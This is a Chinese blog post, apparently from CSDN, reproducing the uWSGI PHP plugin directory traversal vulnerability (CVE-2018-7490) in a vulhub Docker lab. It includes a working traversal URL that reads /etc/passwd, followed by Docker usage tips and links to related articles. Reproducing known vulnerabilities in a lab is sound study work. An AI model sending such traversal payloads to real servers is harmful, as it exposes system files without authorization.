uWSGI PHP目录穿越漏洞(CVE-2018-7490)

最新推荐文章于 2024-07-19 08:43:25 发布
最新推荐文章于 2024-07-19 08:43:25 发布
阅读量1k 收藏
点赞数
分类专栏: 中间件漏洞复现 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zy15667076526/article/details/111824876
版权

声明

好好学习,天天向上

漏洞描述

uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言。

uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过..%2f来跨越目录,读取或运行DOCUMENT_ROOT目录以外的文件。

影响范围

uWSGI 2.0.17之前版本

复现过程

这里使用2.0.16版本

使用vulhub

/app/vulhub-master/uwsgi/CVE-2018-7490

使用docker启动

docker-compose build
docker-compose up -d

环境启动后,访问

http://192.168.239.129:8080

访问

http://192.168.239.129:8080/..%2f..%2f..%2f..%2f..%2fetc/passwd

在这里插入图片描述

关闭镜像(每次用完后关闭)

docker-compose down

docker-compose常用命令

拉镜像(进入到vulhub某个具体目录后)

docker-compose build
docker-compose up -d

镜像查询(查到的第一列就是ID值)

docker ps -a

进入指定镜像里面(根据上一条查出的ID进入)

docker exec -it ID /bin/bash

关闭镜像(每次用完后关闭)

docker-compose down
维梓-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
uwsgi-2.0.18.tar.gz
07-02
1. **安装uwsgi**: 首先,你需要解压uwsgi-2.0.18.tar.gz,然后进入解压后的目录。通过运行`./configure`配置编译选项,接着执行`make`进行编译,最后使用`sudo make install`进行安装。 2. **配置uwsgi**: 创建一...
uWSGI 漏洞复现(CVE-2018-7490
Atkx's Blog
04-03 3626
目录标题漏洞简介影响版本漏洞分析漏洞复现 漏洞简介 CVE-2018-7490PHP目录穿越漏洞uWSGI是一个Web服务器,它实现了WSGI协议、uwsgi、http等协议。Nginx中HttpUwsgiModule的作用是与uWSGI服务器进行交换。WSGI是一种Web服务器网关接口。它是一个Web服务器(如nginx,uWSGI等服务器)与web应用(如用Flask框架写的程序)通信的一种规范。 影响版本 uWSGI 2.0.17之前版本中存在路径遍历漏洞漏洞分析 uWSGI 2.0.17
Nginx
qq_21896123的博客
09-08 433
nginx Nginx 基本概念 ngixn是什么,做什么事情 Nginx (“engine x”) 是一个高性能的 HTTP 和反向代理服务器,特点是占有内存少,并发能力强,事实上 nginx 的并发能力确实在同类型的网页服务器中表现较好,中国大陆使用 nginx 网站用户有:百度、京东、新浪、网易、腾讯、淘宝等。Nginx作为web服务器,性能是其最重要的考量,实现上非常注重效率 ,能经受高负载的考验,有报告表明能支持高达 50,000 个并发连接数。 正向代理 如果把局域网外的 Internet 想象
uWSGI PHP 目录遍历漏洞CVE-2018-7490
H_123s的博客
08-09 379
1.漏洞详情 uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议。 uWSGI2.0.17之前的版本中存在路径遍历漏洞,该漏洞源于程序没有正确的处理DOCUMENT_ROOT检测。攻击者可通过发送带有“…”序列的特殊url请求利用该漏洞查看系统上的任意文件。 2.漏洞编号 CVE-2018-7490 3.影响版本 Debian Debian_linux:8.0 Debian Debian_linux:9.0 4.启动环境 进入漏洞目录下,编译并启动环境 docker-co.
uwsgi-plugin-python-2.0.16-1.el7.x86_64.rpm
12-31
官方离线安装包,测试可用。使用rpm -ivh [rpm完整包名] 进行安装
wagtailfrontendcache-uwsgi:基于uWSGI缓存模块的前端缓存
02-06
1. **安装插件**:首先,你需要将解压后的`wagtailfrontendcache-uwsgi-master`文件夹复制到你的Wagtail项目中的`python_modules`目录,如果没有这个目录,可以创建一个。然后在你的项目设置中,添加该模块到`...
uwsgi-plugin-python3-2.0.18-4.el8.aarch64.rpm
12-06
离线安装包,亲测可用
uwsgi-plugin-python3-tornado-2.0.18-4.el8.aarch64.rpm
12-05
离线安装包,亲测可用
uWSGI PHP目录穿越 CVE-2018-7490 漏洞复现
Senimo
07-27 1045
uWSGI PHP目录穿越 CVE-2018-7490 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 二、漏洞影响 三、漏洞复现 1、环境搭建 2、漏洞复现 四、漏洞POC 五、参考链接 ...
uWSGI 目录穿越CVE-2018-7490
最新发布
qq_23003811的博客
07-19 143
uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过..%2f来跨越目录,读取或运行DOCUMENT_ROOT目录以外的文件。
vulfocus——uWSGI 目录穿越(CVE-2018-7490)
m0_62063669的博客
09-03 614
uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言,uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过..%2f来跨越目录,读取或运行DOCUMENT_ROOT目录以外的文件。但是我没并于读取到flag,然后回到phpinfo()的页面,找到了flag。能不能进行目录穿越,结果发现发现页面和url都没有改变,说明../被过滤了。../../../看。
CVE-2018-7490 uSWGI PHP遍历漏洞 vulhub复现
ANOrange的博客
06-15 696
记录vulhub靶场中CVE-2018-7490漏洞复现及小笔记
CVE-2018-7490 uWSGI PHP目录穿越漏洞
weixin_51387754的博客
01-17 3213
漏洞简介 uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言。 uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过..%2f来跨越目录,读取或运行DOCUMENT_ROOT目录以外的文件。 漏洞复现 运行存在漏洞uWSGI服务器: docker-compose up -d 运行完成后,访问http://your-ip:8080/即可看到phpinfo信息,说明uwsgi-php服务器已
【墨者学院 】uWSGI 漏洞复现(CVE-2018-7490
热门推荐
Summer's blog
05-13 1万+
0x01 漏洞详情 uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议。 uWSGI 2.0.17之前版本中存在路径遍历漏洞,该漏洞源于程序没有正确的处理DOCUMENT_ROOT检测。攻击者可通过发送带有‘…’序列的特制URL请求利用该漏洞查看系统上的任意文件。 uWSGI 2.0.17之前版本中存在路径遍历漏洞,该漏洞源于程序没有正确的处理DOCUMENT_RO...
CVE-2018-7490 uWSGI PHP Plugin目录遍历
king丶
07-12 846
#攻击标题:uWSGI PHP Plugin目录遍历 #日期:2018年3月1日 #开发作者:Marios Nicolaides-RUNESEC #评审人:西蒙·洛伊齐德斯和尼古拉斯·马基塔尼斯-鲁内塞克 #供应商主页:https://uwsgi-docs.readthedocs.io #受影响的软件:2.0.17之前的uWSGI PHP Plugin #测试依据:uWSGI 2.0.12和2.0.15 #公司代码:CVE-2018-7490 #类别:Web应用程序 概述 ...
uWSGI目录遍历(CVE-2018-7490
weixin_46801402的博客
11-04 537
uWSGI目录遍历(CVE-2018-7490
pip install uwsgi subprocess-exited-with-error
06-20
`pip install uwsgi subprocess-exited-with-error` 这个命令是在使用 Python 包管理器 pip 安装两个 Python 库。具体解释如下: 1. `uwsgi`: UWSGI (Unified Web Server Gateway Interface) 是一个高性能的 Python...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值